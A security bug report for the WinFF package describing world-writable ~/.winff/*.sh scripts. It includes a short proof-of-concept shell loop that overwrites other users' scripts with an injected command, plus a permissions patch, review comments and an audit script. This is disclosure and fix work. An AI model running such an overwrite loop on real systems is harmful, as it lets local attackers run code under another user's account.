Package: winff
Version: 1.5.5-9
Tags: security patch

As it was noted in <https://github.com/WinFF/winff/issues/242>, WinFF changes permissions of ~/.winff/*.sh files to 0777, which is world-writable!

Assuming default permissions of the home directory and the .winff subdir, this can be exploited by local users to execute arbitrary code with the context of the user running WinFF.

I've attached a proof-of-concept exploit. (It's not 100% reliable.)

I've also attached an untested patch.

--
Jakub Wilk
#!/bin/sh
while true
do
    for file in /home/*/.winff/*.sh
    do
        echo 'cowsay pwned >&2; sleep inf' | tee "$file" > /dev/null
    done
done
diff --git a/winff/unit1.pas b/winff/unit1.pas
index 71689a6..6a77b02 100644
--- a/winff/unit1.pas
+++ b/winff/unit1.pas
@@ -1354,7 +1354,7 @@ begin
 
      script.SaveToFile(presetspath+batfile);
      {$ifdef unix}
-     fpchmod(presetspath + batfile,&777);
+     fpchmod(presetspath + batfile,&700);
      {$endif}
 
     scriptprocess.ShowWindow := swoNone;
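Review bot: The result of fpchmod on the changed line is ignored, and the mode is applied only after script.SaveToFile has already written the script. A file left at 0777 by an earlier run keeps that mode while it is being rewritten, and if the chmod fails the code still continues to the scriptprocess setup. Suggest checking the return value and not starting the script on failure, and preferably creating the file owner-only from the start instead of tightening it afterwards.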
@@ -2494,7 +2494,7 @@ begin                                     // get setup
      begin
 
        {$ifdef unix}
-       fpchmod(presetspath + batfile,&777);
+       fpchmod(presetspath + batfile,&700);
        {$endif}
 
                                                         // do it
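Review bot: In the "get setup" block the fpchmod result is again unchecked right before the "// do it" step, and the mode literal &700 is now repeated at two call sites. Suggest a single named constant for the script mode, with a comment saying why it is owner-only, and skipping execution when the call fails.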

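A check for the condition described in the report, as an added example that is not part of the original message or of WinFF: it lists `.sh` files that group or others can write, flags a writable directory, and can tighten the files to 0700, the mode used in the attached patch. The function names and the command-line handling are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a WinFF script directory (such as ~/.winff) for the
# condition in the report. Function names are this example's own.

# List *.sh files under "$1" that group or others may write (e.g. mode 0777).
winff_find_writable() {
    find "$1" -type f -name '*.sh' \( -perm -020 -o -perm -002 \) -print
}

# Print "$1" if the directory itself is group- or world-writable; in that
# case scripts can be replaced no matter what mode the files carry.
winff_dir_exposed() {
    find "$1" -prune -type d \( -perm -020 -o -perm -002 \) -print
}

# Set every file found above to 0700 (the mode used in the patch) and print
# its name. find returns non-zero if any chmod invocation fails.
winff_fix_writable() {
    find "$1" -type f -name '*.sh' \( -perm -020 -o -perm -002 \) \
        -print -exec chmod 700 {} +
}

# Usage: sh winff-audit.sh DIR [fix]
if [ "$#" -gt 0 ]; then
    [ -d "$1" ] || { echo "not a directory: $1" >&2; exit 2; }
    [ -z "$(winff_dir_exposed "$1")" ] || echo "directory is writable by others: $1"
    if [ "${2:-}" = fix ]; then
        winff_fix_writable "$1"
    else
        winff_find_writable "$1"
    fi
fi
```

Run it with the directory alone to report, or with `fix` as the second argument to apply 0700 to the files it reports.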